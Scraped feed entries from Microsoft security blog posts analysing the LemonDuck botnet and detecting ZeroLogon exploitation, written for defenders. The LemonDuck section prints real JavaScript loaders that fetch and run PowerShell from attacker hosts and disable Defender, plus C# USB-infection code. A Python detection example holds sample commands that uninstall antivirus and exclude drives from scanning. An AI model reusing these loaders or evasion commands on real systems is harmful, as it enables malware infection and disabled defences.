 * the outbreak of CORONA VIRUS is cause of concern especially where forign personal have recently arrived or will be arriving at various intt in near future.
 * what's wrong with you?are you out of your mind!!!!!
 * are you out of your mind!!!!!what 's wrong with you?
 * good bye, keep in touch
 * can you help me to fix the file,i can't read it
 * file is brokened, i can't open it

The attachment used for these lures is one of three types: .doc, .js, or a .zip containing a .js file. Whatever the type, the file is named “readme”. Occasionally, all three types are present in the same email.

_Figure 3. Sample email_

While the JavaScript is detected by many security vendors, it might be classified with generic detection names. It could be valuable for organizations to sanitize JavaScript or VBScript executing or calling prompts (such as PowerShell) directly from mail downloads through solutions such as [custom detection rules](<https://docs.microsoft.com/en-us/microsoft-365/security/defender/custom-detection-rules?view=o365-worldwide>).

Since LemonDuck began operating, the .zip to .js file execution method has been the most common. The JavaScript has replaced the scheduled task that LemonDuck previously used to kickstart the PowerShell script. This PowerShell script has looked very similar throughout 2020 and 2021, with minor changes depending on the version, indicating continued development. 
Below is a comparison of changes from the most recent iterations of the email-delivered downloads and those from April of 2020.

**April 2020 PowerShell script**

```javascript
var cmd =new ActiveXObject("WScript.Shell");var cmdstr="cmd /c start /b notepad "+WScript.ScriptFullName+" & powershell -w hidden -c \"if([Environment]::OSVersion.version.Major -eq '10'){Set-ItemProperty -Path 'HKCU:\Environment' -Name 'windir' -Value 'cmd /c powershell -w hidden Set-MpPreference -DisableRealtimeMonitoring 1 & powershell -w hidden IEx(New-Object Net.WebClient).DownLoadString(''http://t.awcna.com/mail.jsp?js*%username%*%computername%''+[Environment]::OSVersion.version.Major) &::';sleep 1;schtasks /run /tn \\Microsoft\\Windows\\DiskCleanup\\SilentCleanup /I;Remove-ItemProperty -Path 'HKCU:\Environment' -Name 'windir' -Force}else{IEx(ne`w-obj`ect Net.WebC`lient).DownloadString('http://t.awcna.com/7p.php');bpu -method migwiz -Payload 'powershell -w hidden IEx(New-Object Net.WebClient).DownLoadString(''http://t.awcna.com/mail.jsp?js*%username%*%computername%''+[Environment]::OSVersion.version.Majo
//This File is broken.
```

**March 2021 PowerShell script**

```javascript
var cmd =new ActiveXObject("WScript.Shell");var cmdstr="cmd /c start /b notepad "+WScript.ScriptFullName+" & powershell -w hidden IE`x(Ne`w-Obj`ect Net.WebC`lient).DownLoadString('http://t.z'+'z3r0.com/7p.php?0.7*mail_js*%username%*%computername%*'+[Environment]::OSVersion.version.Major);bpu ('http://t.z'+'z3r0.com/mail.jsp?js_0.7')";cmd.run(cmdstr,0,1);
//This File is broken.
```

After the emails are sent, the inbox is cleaned to remove traces of these mails. This method of self-spreading is attempted on any affected device that has a mailbox, regardless of whether it is an Exchange server.

Other common methods of infection include movement within the compromised environment, as well as through USB and connected drives. 
These processes are often kicked off automatically and have occurred consistently throughout the entirety of LemonDuck’s operation.

These methods run as a series of C# scripts that gather available drives for infection. They also create a running list of drives that are already infected, based on whether the threat is found already installed. Once checked against the running list of infected drives, these scripts attempt to create a set of hidden files in the home directory, including a copy of _readme.js_. Any device that has been affected by the LemonDuck implants at any time could have had any number of drives attached to it that are compromised in this manner. This makes this behavior a possible entry vector for additional attacks.

```csharp
DriveInfo[] drives = DriveInfo.GetDrives();
foreach (DriveInfo drive in drives)
{
    // Drives already processed in this run are skipped.
    if (blacklist.Contains(drive.Name))
    { continue; }
    Console.WriteLine("Detect drive:" + drive.Name);
    if (IsSupported(drive))
    {
        // The marker file in the hidden home directory is the "already infected" check.
        if (!File.Exists(drive + home + inf_data))
        {
            Console.WriteLine("Try to infect " + drive.Name);
            if (CreateHomeDirectory(drive.Name) && Infect(drive.Name))
            {
                blacklist.Add(drive.Name);
            }
        }
        else
        {
            Console.WriteLine(drive.Name + " already infected!");
            blacklist.Add(drive.Name);
        }
    }
    else
    {
        // Unsupported drive types are recorded so they are not retried.
        blacklist.Add(drive.Name);
    }
}
```

## Comprehensive protection against a wide-ranging malware operation

The cross-domain visibility and coordinated defense delivered by [Microsoft 365 Defender](<https://www.microsoft.com/en-us/microsoft-365/security/microsoft-365-defender>) is designed for the wide range and increasing sophistication of threats that LemonDuck exemplifies. Microsoft 365 Defender has AI-powered, industry-leading protections that can stop multi-component threats like LemonDuck across domains and across platforms. Microsoft Defender for Office 365 detects the malicious emails sent by the LemonDuck botnet to deliver malware payloads as well as spread the bot loader. 
Microsoft Defender for Endpoint detects and blocks LemonDuck implants, payloads, and malicious activity on Linux and Windows.

More importantly, Microsoft 365 Defender provides rich investigation tools that can expose detections of LemonDuck activity, including attempts to compromise and gain a foothold on the network, so security operations teams can efficiently and confidently respond to and resolve these attacks. Microsoft 365 Defender correlates cross-platform, cross-domain signals to paint the end-to-end attack chain, allowing organizations to see the full impact of an attack. We also published a threat analytics article on this threat. Microsoft 365 Defender customers can use this report to get important technical details, guidance for investigation, consolidated incidents, and steps to mitigate this threat in particular and modern cyberattacks in general.

In Part 2 of this blog series, we share our in-depth technical analysis of the malicious actions that follow a LemonDuck infection. These include general, automatic behavior as well as human-initiated behavior. We will also provide guidance for investigating LemonDuck attacks, as well as mitigation recommendations for strengthening defenses against these attacks. 
**READ: [When coin miners evolve, Part 2: Hunting down LemonDuck and LemonCat attacks](<https://www.microsoft.com/security/blog/2021/07/29/when-coin-miners-evolve-part-2-hunting-down-lemonduck-and-lemoncat-attacks/>).**

_Microsoft 365 Defender Threat Intelligence Team_

The post [When coin miners evolve, Part 1: Exposing LemonDuck and LemonCat, modern mining malware infrastructure](<https://www.microsoft.com/security/blog/2021/07/22/when-coin-miners-evolve-part-1-exposing-lemonduck-and-lemoncat-modern-mining-malware-infrastructure/>) appeared first on [Microsoft Security Blog](<https://www.microsoft.com/security/blog>).", "published": "2021-07-22T16:00:57", "type": "mssecure", "title": "When coin miners evolve, Part 1: Exposing LemonDuck and LemonCat, modern mining malware infrastructure", "bulletinFamily": "blog", "cvelist": ["CVE-2017-0144", "CVE-2017-8464", "CVE-2019-0708", "CVE-2020-0796", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065"], "modified": "2021-07-22T16:00:57", "id": "MSSECURE:E537BA51663A720821A67D2A4F7F7F0E", "href": "https://www.microsoft.com/security/blog/2021/07/22/when-coin-miners-evolve-part-1-exposing-lemonduck-and-lemoncat-modern-mining-malware-infrastructure/"}], "mmpc": [{"lastseen": "2020-12-02T21:51:37", "description": "There has been a huge focus on the recently patched CVE-2020-1472 Netlogon Elevation of Privilege vulnerability, widely known as ZeroLogon. While Microsoft strongly recommends that you deploy the latest security updates to your servers and devices, we also want to provide you with the best detection coverage possible for your domain controllers. [Microsoft Defender for Identity](<https://www.microsoft.com/en-us/microsoft-365/security/identity-defender>) along with other [Microsoft 365 Defender](<https://aka.ms/m365d>) solutions detect adversaries as they try to exploit this vulnerability against your domain controllers.

## Here is a sneak peek into our detection lifecycle

Whenever a vulnerability or attack surface is disclosed, our research teams immediately investigate exploits and produce various methods for detecting attacks. This is highlighted in our response to suspected [WannaCry](<https://docs.microsoft.com/en-us/defender-for-identity/compromised-credentials-alerts#suspected-wannacry-ransomware-attack-external-id-2035>) attacks and with the alert for [Suspected SMB (Server Message Block) packet manipulation](<https://docs.microsoft.com/en-us/azure-advanced-threat-protection/lateral-movement-alerts#suspected-smb-packet-manipulation-cve-2020-0796-exploitation---preview-external-id-2406>) (CVE-2020-0796 exploitation). 
These detection methods are tested in our lab environment, and experimental detectors are deployed to Microsoft Defender for Identity to assess performance and accuracy and find possible attacker activity.

Over the past two months since CVE-2020-1472 was first disclosed, interest in this detection rapidly increased. This happened even though we did not observe any activity matching exploitation of this vulnerability in the initial weeks after the August security updates. It generally takes a while before disclosed vulnerabilities are successfully reverse-engineered and corresponding mechanisms are built.

This lack of activity changed on September 13, when we triggered a surge in alerts. This increase in activity coincided with the publication of several proof-of-concept tools and demo exploits that can leverage the vulnerability.

_Figure 1: Orgs with ZeroLogon exploitation attempts by red teams and real attackers starting September 13, 2020_

Microsoft Defender for Identity can detect this vulnerability early on. 
It covers both the aspects of exploitation and traffic inspection of the Netlogon channel.

_Figure 2: Alert page experience_

With this Microsoft Defender for Identity alert, you will be able to identify:

 * The device that attempted the impersonation.
 * The domain controller.
 * The targeted asset.
 * Whether the impersonation attempts were successful.

Finally, customers using [Microsoft 365 Defender](<https://www.microsoft.com/en-us/microsoft-365/security/microsoft-365-defender>) can take full advantage of the power of the signals and alerts from Microsoft Defender for Identity, combined with behavioral events and detections from [Microsoft Defender for Endpoint](<https://www.microsoft.com/en-us/microsoft-365/security/endpoint-defender>). This coordinated protection enables you not just to observe Netlogon exploitation attempts over network protocols, but also to see device process and file activity associated with the exploitation.

## A close look at some of the earliest ZeroLogon attacks

ZeroLogon is a powerful vulnerability for attackers to leverage, but in a normal attack scenario, it will require an initial entry vector inside an organization to facilitate exploitation against domain controllers. During initial monitoring of security signals, [Microsoft Threat Experts](<https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/microsoft-threat-experts>) observed ZeroLogon exploitation activity in multiple organizations. In many cases, it was clear that the activity originated from red teams or pen testers using automated vulnerability scanners to locate vulnerable servers. 
However, Microsoft researchers were also able to identify a few limited cases of real attackers jumping on the ZeroLogon train to expand their perimeter into organizations that, after a month of a patch being available, were still running unpatched domain controllers.

_Figure 3: Typical Zerologon exploitation activity generated by a vulnerability scanner or a red team testing domain controller at scale_

One of the adversaries noticed by our analysts was interesting because the attacker leveraged an older vulnerability for SharePoint (CVE-2019-0604) to remotely exploit unpatched servers (typically Windows Server 2008 and Windows Server 2012) and then implant a web shell to gain persistent access and code execution. Following the web shell installation, this attacker quickly deployed a Cobalt Strike based payload and immediately started exploring the network perimeter and targeting domain controllers found with the ZeroLogon exploit.

Using the @MsftSecIntel Twitter handle, we [publicly shared some file indicators](<https://twitter.com/MsftSecIntel/status/1308941504707063808>) used during the attack. We also shared the variations of the ZeroLogon exploits we detected, many of which were recompiled versions of well-known, publicly available proof-of-concept code. Microsoft Defender for Endpoint can also detect certain file-based versions of the CVE-2020-1472 exploit when executed on devices protected by Microsoft Defender for Endpoint.

## Hunting for ZeroLogon in Microsoft 365 Defender

Combining signals from Microsoft Defender for Endpoint with the ZeroLogon alerts from Microsoft Defender for Identity can help assess the nature of the alert quickly. Microsoft 365 Defender automatically leverages signals from both products. 
It has logic that constantly attempts to combine alerts and events using a variety of correlation logic based on knowledge of cause-effect attack flows, the MITRE ATT&CK framework, and machine learning models.\n\nIn this section, we provide an example (in the simplified form of an [advanced hunting query](<https://docs.microsoft.com/en-gb/microsoft-365/security/mtp/advanced-hunting-overview?view=o365-worldwide>)) of how Microsoft 365 Defender correlation logic operates behind the scenes to combine alerts, reducing security operations center (SOC) fatigue and facilitating investigation.\n\nThe following Microsoft 365 Defender advanced hunting queries identify process and network connection details from the source device suspected to have launched the NetLogon exploit.\n\n\n\nFirst, we gather the relevant details on recent Netlogon exploit attempts from Microsoft Defender for Identity alerts. This will help populate the AlertId for the second query.\n\n```kusto\n// Find all Netlogon exploit attempt alerts containing source devices\nlet queryWindow = 3d;\nAlertInfo\n| where Timestamp > ago(queryWindow)\n| where ServiceSource == \"Azure ATP\"\n| where Title == \"Suspected Netlogon privilege elevation attempt (CVE-2020-1472 exploitation)\"\n| join (AlertEvidence\n| where Timestamp > ago(queryWindow)\n| where EntityType == \"Machine\"\n| where EvidenceDirection == \"Source\"\n| where isnotempty(DeviceId)\n) on AlertId\n| summarize by AlertId, DeviceId, Timestamp\n```\n\nNext, populate one AlertId from the prior query into NLAlertId in the next query to hunt for the likely process that launched the exploit and its network connection to the domain controller:\n\n```kusto\n// Find potential endpoint Netlogon exploit evidence from AlertId\nlet NLAlertId = \"insert alert ID here\";\nlet lookAhead = 1m;\nlet lookBehind = 6m;\n// Source-device evidence for the alert; its earliest timestamp anchors the time window\nlet NLEvidence = AlertEvidence\n| where AlertId == NLAlertId\n| where EntityType == \"Machine\"\n| where EvidenceDirection == \"Source\"\n| where isnotempty(DeviceId)\n| summarize Timestamp=arg_min(Timestamp, *) by DeviceId;\nlet sourceMachine = NLEvidence | distinct DeviceId;\nlet alertTime = todatetime(toscalar(NLEvidence | distinct Timestamp));\n// Netlogon runs over MS-RPC: the endpoint mapper (135) plus the dynamic RPC port range\nDeviceNetworkEvents\n| where Timestamp between ((alertTime - lookBehind) .. (alertTime + lookAhead))\n| where DeviceId in (sourceMachine)\n| where RemotePort == 135 or RemotePort between (49670 .. 49680)\n| summarize (ReportId, Timestamp, InitiatingProcessFileName, InitiatingProcessCommandLine, InitiatingProcessAccountSid)=arg_min(ReportId, Timestamp, InitiatingProcessFileName, InitiatingProcessCommandLine, InitiatingProcessAccountSid), TargetDevicePorts=make_set(RemotePort) by DeviceId, DeviceName, RemoteIP, RemoteUrl\n| project-rename SourceComputerName=DeviceName, SourceDeviceId=DeviceId, TargetDeviceIP=RemoteIP, TargetComputerName=RemoteUrl\n```\n\nThis query can return a result that looks like this:\n\n\n\nTying Microsoft Defender for Endpoint data together with the original Microsoft Defender for Identity alert can give a clearer picture as to what happened on the device suspected of launching the exploit. 
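The same two-step correlation, written out as an added Python example (not Microsoft's code) over constructed sample rows so the join and time-window logic can be traced offline; column names follow the queries above, while the device names, the DC address and the scanner process are assumptions.

```python
from datetime import datetime, timedelta

NETLOGON_TITLE = ("Suspected Netlogon privilege elevation attempt "
                  "(CVE-2020-1472 exploitation)")
QUERY_WINDOW = timedelta(days=3)     # let queryWindow = 3d
LOOK_BEHIND = timedelta(minutes=6)   # let lookBehind = 6m
LOOK_AHEAD = timedelta(minutes=1)    # let lookAhead = 1m
# Netlogon is an MS-RPC service: the endpoint mapper (135) plus the dynamic
# RPC port range the second query watches (49670-49680).
RPC_PORTS = {135} | set(range(49670, 49681))


def ts(s):
    return datetime.fromisoformat(s)


def net(time, report_id, device, port, proc, cmd):
    """One constructed DeviceNetworkEvents row; every row targets the same DC."""
    return {"Timestamp": ts(time), "ReportId": report_id, "DeviceId": device,
            "DeviceName": device + ".corp.example", "RemoteIP": "10.0.0.5",
            "RemoteUrl": "dc01.corp.example", "RemotePort": port,
            "InitiatingProcessFileName": proc, "InitiatingProcessCommandLine": cmd,
            "InitiatingProcessAccountSid": "S-1-5-21-1000-1001-1002-1103"}


# Constructed sample data: one Netlogon alert (da1) and one unrelated alert (da2).
NOW = ts("2020-10-01T12:00:00")
ALERT_INFO = [
    {"AlertId": "da1", "ServiceSource": "Azure ATP", "Title": NETLOGON_TITLE,
     "Timestamp": ts("2020-10-01T10:00:00")},
    {"AlertId": "da2", "ServiceSource": "Azure ATP",
     "Title": "Suspected brute-force attack (Kerberos, NTLM)",
     "Timestamp": ts("2020-10-01T09:00:00")},
]
ALERT_EVIDENCE = [
    {"AlertId": "da1", "EntityType": "Machine", "EvidenceDirection": "Source",
     "DeviceId": "ws01", "Timestamp": ts("2020-10-01T10:00:00")},
    {"AlertId": "da1", "EntityType": "Machine", "EvidenceDirection": "Destination",
     "DeviceId": "dc01", "Timestamp": ts("2020-10-01T10:00:00")},
    {"AlertId": "da2", "EntityType": "Machine", "EvidenceDirection": "Source",
     "DeviceId": "ws02", "Timestamp": ts("2020-10-01T09:00:00")},
]
SCAN = "vulnscan.exe --module netlogon --target dc01.corp.example"  # hypothetical scanner
DEVICE_NETWORK_EVENTS = [
    net("2020-10-01T09:59:30", 12, "ws01", 135, "vulnscan.exe", SCAN),
    net("2020-10-01T09:59:31", 13, "ws01", 49672, "vulnscan.exe", SCAN),
    net("2020-10-01T09:59:40", 14, "ws01", 445, "explorer.exe", "explorer.exe"),  # SMB, not RPC
    net("2020-10-01T09:50:00", 9, "ws01", 135, "svchost.exe", "svchost.exe -k rpcss"),  # too early
    net("2020-10-01T09:59:35", 15, "ws02", 49672, "vulnscan.exe", SCAN),  # not the source device
]


def source_evidence(alert_id, alert_evidence):
    """AlertEvidence rows naming the machine an alert was raised from."""
    return [e for e in alert_evidence if e["AlertId"] == alert_id
            and e["EntityType"] == "Machine" and e["EvidenceDirection"] == "Source"
            and e.get("DeviceId")]


def find_netlogon_alerts(alert_info, alert_evidence, now=NOW):
    """First query: Netlogon alerts inside the window, joined to their source device."""
    since = now - QUERY_WINDOW
    ids = {a["AlertId"] for a in alert_info if a["Timestamp"] > since
           and a["ServiceSource"] == "Azure ATP" and a["Title"] == NETLOGON_TITLE}
    return sorted({(e["AlertId"], e["DeviceId"], e["Timestamp"])
                   for i in ids for e in source_evidence(i, alert_evidence)
                   if e["Timestamp"] > since})


def find_exploit_evidence(alert_id, alert_evidence, network_events):
    """Second query: the earliest RPC connection per (source device, target) inside
    [alert - 6m, alert + 1m], plus the set of target ports that were touched."""
    src = source_evidence(alert_id, alert_evidence)
    if not src:
        return []
    alert_time = min(e["Timestamp"] for e in src)           # arg_min(Timestamp, *)
    source_ids = {e["DeviceId"] for e in src}
    groups = {}
    for ev in network_events:
        if not (alert_time - LOOK_BEHIND <= ev["Timestamp"] <= alert_time + LOOK_AHEAD):
            continue
        if ev["DeviceId"] not in source_ids or ev["RemotePort"] not in RPC_PORTS:
            continue
        key = (ev["DeviceId"], ev["DeviceName"], ev["RemoteIP"], ev["RemoteUrl"])
        g = groups.setdefault(key, {"first": ev, "ports": set()})
        g["ports"].add(ev["RemotePort"])
        if ev["ReportId"] < g["first"]["ReportId"]:            # arg_min(ReportId, ...)
            g["first"] = ev
    return [{"SourceDeviceId": k[0], "SourceComputerName": k[1],
             "TargetDeviceIP": k[2], "TargetComputerName": k[3],
             "Timestamp": g["first"]["Timestamp"],
             "InitiatingProcessFileName": g["first"]["InitiatingProcessFileName"],
             "InitiatingProcessCommandLine": g["first"]["InitiatingProcessCommandLine"],
             "InitiatingProcessAccountSid": g["first"]["InitiatingProcessAccountSid"],
             "TargetDevicePorts": sorted(g["ports"])} for k, g in groups.items()]
```

Only the scanner's two RPC connections survive the filters; the SMB connection, the earlier RPC traffic and the other workstation's traffic are dropped, which is what lets the analyst read the initiating process straight off the result.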
This could save SOC analysts time when investigating alerts, because the relevant details are there to determine whether it was caused by a curious researcher or by an actual attack.\n\n## Defend against ZeroLogon\n\nLearn more about the [alert here](<https://docs.microsoft.com/en-us/azure-advanced-threat-protection/compromised-credentials-alerts#suspected-netlogon-privilege-elevation-attempt-cve-2020-1472-exploitationexternalid2411>), along with information on all the alerts Defender for Identity uses to help you stay protected from identity-based attacks.\n\nAlso, feel free to review [our guidance](<https://support.microsoft.com/help/4557222/how-to-manage-the-changes-in-netlogon-secure-channel-connections-assoc>) on managing changes in Netlogon secure channel connections and how you can prevent this vulnerability.\n\nCustomers with Microsoft Defender for Endpoint can get additional guidance from [the threat analytics article](<https://securitycenter.windows.com/threatanalytics3/c57607da-fb94-43f3-b8ba-1acda0242900/analystreport>) available in Microsoft Defender Security Center.\n\n## Get started today\n\nAre you just starting your Microsoft Defender for Identity journey? 
Begin a trial of [Microsoft 365 Defender](<https://www.microsoft.com/en-us/microsoft-365/security/microsoft-365-defender>) to experience the benefits of the most comprehensive, integrated, and secure threat protection solution for your organization.\n\nJoin the [Microsoft Defender for Identity Tech Community](<https://techcommunity.microsoft.com/t5/Azure-Advanced-Threat-Protection/bd-p/AzureAdvancedThreatProtection>) for the latest updates and news about Identity Security Posture Management assessments, detections, and other updates.\n\nTo learn more about Microsoft Security solutions [visit our website](<https://www.microsoft.com/en-us/security/business/solutions>). Bookmark the [Security blog](<https://www.microsoft.com/security/blog/>) to keep up with our expert coverage on security matters. Also, follow us at [@MSFTSecurity](<https://twitter.com/@MSFTSecurity>) for the latest news and updates on cybersecurity.\n\nThe post [Zerologon is now detected by Microsoft Defender for Identity](<https://www.microsoft.com/security/blog/2020/11/30/zerologon-is-now-detected-by-microsoft-defender-for-identity/>) appeared first on [Microsoft Security.", "published": "2020-11-30T17:00:20", "title": "Zerologon is now detected by Microsoft Defender for Identity", "cvelist": ["CVE-2019-0604", "CVE-2020-0796", "CVE-2020-1472"], "id": "MMPC:D6D537E875C3CBD84822A868D24B31BA", "href": "https://www.microsoft.com/security/blog/2020/11/30/zerologon-is-now-detected-by-microsoft-defender-for-identity/"}, {"lastseen": "2021-08-13T21:41:38", "description": "_[Note: In this two-part blog series, we expose a modern malware infrastructure and provide guidance for protecting against the wide range of threats it enables. [Part 1](<https://www.microsoft.com/security/blog/2021/07/22/when-coin-miners-evolve-part-1-exposing-lemonduck-and-lemoncat-modern-mining-malware-infrastructure/>) covered the evolution of the threat, how it spreads, and how it impacts organizations. Part 2 provides a deep dive on the attacker behavior and outlines investigation guidance.] _\n\nLemonDuck is an actively updated and robust malware primarily known for its botnet and cryptocurrency mining objectives. As we discussed in [Part 1](<https://www.microsoft.com/security/blog/2021/07/22/when-coin-miners-evolve-part-1-exposing-lemonduck-and-lemoncat-modern-mining-malware-infrastructure/>) of this blog series, in recent months LemonDuck adopted more sophisticated behavior and escalated its operations. 
Today, beyond using resources for its traditional bot and mining activities, LemonDuck steals credentials, removes security controls, spreads via emails, moves laterally, and ultimately drops more tools for human-operated activity.\n\nLemonDuck spreads in a variety of ways, but the two main methods are (1) compromises that are either edge-initiated or facilitated by bot implants moving laterally within an organization, or (2) bot-initiated email campaigns. After installation, LemonDuck can generally be identified by a predictable series of automated activities, followed by beacon check-in and monetization behaviors, and then, in some environments, human-operated actions.\n\nIn this blog post, we share our in-depth technical analysis of the malicious actions that follow a LemonDuck infection. These include general and automatic behavior, as well as human-operated actions. We also provide guidance for investigating LemonDuck attacks, as well as mitigation recommendations for strengthening defenses against these attacks.\n\n\n\n_Figure 2. LemonDuck attack chain from the Duck and Cat infrastructures_\n\n## External or human-initialized behavior\n\nLemonDuck activity initiated from external applications \u2013 as against self-spreading methods like malicious phishing mail \u2013 is generally much more likely to begin with or lead to human-operated activity. These activities always result in more invasive secondary malware being delivered in tandem with persistent access being maintained through backdoors. These human-operated activities result in greater impact than standard infections.\n\nIn March and April 2021, various vulnerabilities related to the [ProxyLogon](<https://security.microsoft.com/threatanalytics3/4ef1fbc5-5659-4d9b-b32e-97a694475955/overview>) set of Microsoft Exchange Server exploits were utilized by LemonDuck to install web shells and gain access to outdated systems. 
Attackers then used this access to launch additional attacks while also deploying automatic LemonDuck components and malware.\n\nIn some cases, the LemonDuck attackers used renamed copies of the official Microsoft Exchange On-Premises Mitigation Tool to remediate the vulnerability they had used to gain access. They did so while maintaining full access to compromised devices and limiting other actors from abusing the same Exchange vulnerabilities.\n\nThis self-patching behavior is in keeping with the attackers\u2019 general desire to remove competing malware and risks from the device. This allows them to limit visibility of the attack to SOC analysts within an organization who might be prioritizing unpatched devices for investigation, or who would overlook devices that do not have a high volume of malware present.\n\nThe LemonDuck operators also make use of many [fileless malware techniques](<https://www.microsoft.com/security/blog/2018/01/24/now-you-see-me-exposing-fileless-malware/#:~:text=%20These%20techniques%20include%3A%20%201%20Reflective%20DLL,provide%20powerful%20means%20for%20delivering%20memory-only...%20More%20>), which can make remediation more difficult. Fileless techniques, which include persistence via registry, scheduled tasks, WMI, and startup folder, remove the need for stable malware presence in the filesystem. These techniques also include utilizing process injection and in-memory execution, which can make removal non-trivial. It is therefore imperative that organizations that were vulnerable in the past also direct action to investigate exactly how patching occurred, and whether malicious activity persists.\n\nOn the basic side of implementation this can mean registry, scheduled task, WMI and startup folder persistence to remove the necessity for stable malware presence in the filesystem. However, many free or easily available RATs and Trojans are now routinely utilizing process injection and in-memory execution to circumvent easy removal. 
To counter these kinds of behaviors, it\u2019s imperative that security teams within organizations review their incident response and malware removal processes to include all common areas and arenas of the operating system where malware may continue to reside after cleanup by an antivirus solution.\n\n## General, automatic behavior\n\nIf the initial execution begins automatically or from self-spreading methods, it typically originates from a file called _Readme.js_. This behavior could change over time, as the purpose of this .js file is to obfuscate and launch the PowerShell script that pulls additional scripts from the C2. This JavaScript launches a CMD process that subsequently launches Notepad as well as the PowerShell script contained within the JavaScript.\n\nIn contrast, if infection begins with RDP brute force, Exchange vulnerabilities, or other vulnerable edge systems, the first few actions are typically human-operated or originate from a hijacked process rather than from _Readme.js_. After this, the next few actions that the attackers take, including the scheduled task creation, as well as the individual components and scripts, are generally the same.\n\nOne of these actions is to establish fileless persistence by creating scheduled tasks that re-run the initial PowerShell download script. This script pulls its various components from the C2s at regular intervals. The script then checks to see if any portions of the malware were removed and re-enables them. LemonDuck also maintains a backup persistence mechanism through WMI Event Consumers to perform the same actions.\n\nTo host their scripts, the attackers use multiple hosting sites, which as mentioned are resilient to takedown. They also have multiple scheduled tasks to try each site, as well as the WMI events in case other methods fail. If all of those fail, LemonDuck also uses its access methods such as RDP, Exchange web shells, ScreenConnect, and RATs to maintain persistent access. 
These task names can vary over time, but \u201cblackball\u201d, \u201cblutea\u201d, and \u201crtsa\u201d have been persistent throughout 2020 and 2021 and are still seen in new infections as of this report.\n\nLemonDuck attempts to automatically disable Microsoft Defender for Endpoint real-time monitoring and adds whole disk drives \u2013 specifically the _C:\\_ drive \u2013 to the Microsoft Defender exclusion list. This action could in effect disable Microsoft Defender for Endpoint, freeing the attacker to perform other actions. [Tamper protection](<https://docs.microsoft.com/en-us/microsoft-365/security/defender-endpoint/prevent-changes-to-security-settings-with-tamper-protection?view=o365-worldwide>) prevents these actions, but it\u2019s important for organizations to monitor this behavior in cases where individual users set their own exclusion policy.\n\nLemonDuck then attempts to automatically remove a series of other security products through _CMD.exe_, leveraging _WMIC.exe_. The products that we have observed LemonDuck remove include ESET, Kaspersky, Avast, Norton Security, and MalwareBytes. However, they also attempt to uninstall any product with \u201cSecurity\u201d and \u201cAntiVirus\u201d in the name by running the following commands:\n\n\n\nCustom detections in Microsoft Defender for Endpoint or other security solutions can raise alerts on behaviors indicating interactions with security products that are not deployed in the environment. These alerts can allow the quick isolation of devices where this behavior is observed. While this uninstallation behavior is common in other malware, when observed in conjunction with other LemonDuck TTPs, this behavior can help validate LemonDuck infections.\n\nLemonDuck leverages a wide range of free and open-source penetration testing tools. It also uses freely available exploits and functionality such as coin mining. Because of this, the order and the number of times the next few activities are run can change. 
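As an added illustration (not Microsoft's or LemonDuck's code) of the custom detections suggested above: Python rules over constructed DeviceProcessEvents-style rows that flag real-time monitoring being disabled, a whole drive letter being excluded, and a WMIC uninstall of a security product, and that separate products the organization actually deploys (an assumed input) from ones it does not. The hunting queries later in this post express the same checks in KQL.

```python
import re

# Assumed inputs: DeviceProcessEvents-style rows and the set of security products
# the organization actually deploys (both constructed below).
SECURITY_TERMS = ("kaspersky", "avast", "avp", "security", "eset",
                  "antivirus", "norton security", "malwarebytes")
# Set-MpPreference -DisableRealtimeMonitoring $true (also ":$true" or "1")
DISABLE_RTP = re.compile(
    r"set-mppreference.*-disablerealtimemonitoring[\s:]+(\$true|1)\b", re.I)
# Add-MpPreference -ExclusionPath <bare drive root such as C:\>, not a folder
DRIVE_EXCLUSION = re.compile(
    r"add-mppreference.*-exclusionpath\s+['\"]?([a-z]:\\?)['\"]*(\s|;|$)", re.I)
# wmic product where "name like '%<term>%'" call uninstall /nointeractive
WMIC_UNINSTALL = re.compile(
    r"product\s+where\s+.*name\s+like\s+['\"]?%?([^'\"%]+)%?['\"]?.*call\s+uninstall", re.I)
LEMONDUCK_KEYWORDS = re.compile(r"\b(lemon_?duck|siex)\b", re.I)


def classify(event, deployed_products=()):
    """Return the detection names one process event triggers (empty if none)."""
    cmd = event.get("InitiatingProcessCommandLine", "") + " " + event.get("ProcessCommandLine", "")
    image = event.get("InitiatingProcessFileName", "").lower()
    hits = []
    if image in ("powershell.exe", "pwsh.exe"):
        if DISABLE_RTP.search(cmd):
            hits.append("defender_realtime_disabled")
        m = DRIVE_EXCLUSION.search(cmd)
        if m:
            hits.append("defender_whole_drive_excluded:" + m.group(1).upper())
        if LEMONDUCK_KEYWORDS.search(cmd):
            hits.append("lemonduck_keyword")
    if image == "wmic.exe":
        m = WMIC_UNINSTALL.search(cmd)
        if m and any(t in cmd.lower() for t in SECURITY_TERMS):
            product = m.group(1).strip()
            # Uninstalling a product that is not even deployed here cannot be
            # legitimate administration, so it is the stronger signal.
            deployed = any(product.lower() in d.lower() for d in deployed_products)
            hits.append("av_uninstall_attempt:%s:%s"
                        % ("deployed" if deployed else "not_deployed", product))
    return hits


def hunt(events, deployed_products=()):
    """Map DeviceName -> detections raised on that device (devices with none omitted)."""
    findings = {}
    for ev in events:
        for hit in classify(ev, deployed_products):
            findings.setdefault(ev["DeviceName"], []).append(hit)
    return findings


DEPLOYED = ("ESET Endpoint Security",)   # constructed: what this organization runs
EVENTS = [  # constructed sample rows
    {"DeviceName": "ws01", "InitiatingProcessFileName": "powershell.exe",
     "InitiatingProcessCommandLine": "powershell.exe -nop -w hidden -c \"Set-MpPreference "
     "-DisableRealtimeMonitoring $true; Add-MpPreference -ExclusionPath 'C:\\'\""},
    {"DeviceName": "ws01", "InitiatingProcessFileName": "wmic.exe",
     "InitiatingProcessCommandLine": "wmic product where \"name like '%Kaspersky%'\" "
     "call uninstall /nointeractive"},
    {"DeviceName": "ws02", "InitiatingProcessFileName": "wmic.exe",
     "InitiatingProcessCommandLine": "wmic product where \"name like '%ESET%'\" "
     "call uninstall /nointeractive"},
    {"DeviceName": "ws03", "InitiatingProcessFileName": "powershell.exe",  # folder exclusion: benign
     "InitiatingProcessCommandLine": "powershell.exe Add-MpPreference -ExclusionPath 'C:\\Build\\'"},
    {"DeviceName": "ws04", "InitiatingProcessFileName": "wmic.exe",  # not a security product
     "InitiatingProcessCommandLine": "wmic product where \"name like '%Office%'\" "
     "call uninstall /nointeractive"},
    {"DeviceName": "ws05", "InitiatingProcessFileName": "powershell.exe",
     "InitiatingProcessCommandLine": "powershell.exe -w hidden -c \"$env:Lemon_Duck='1'\""},
]
```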
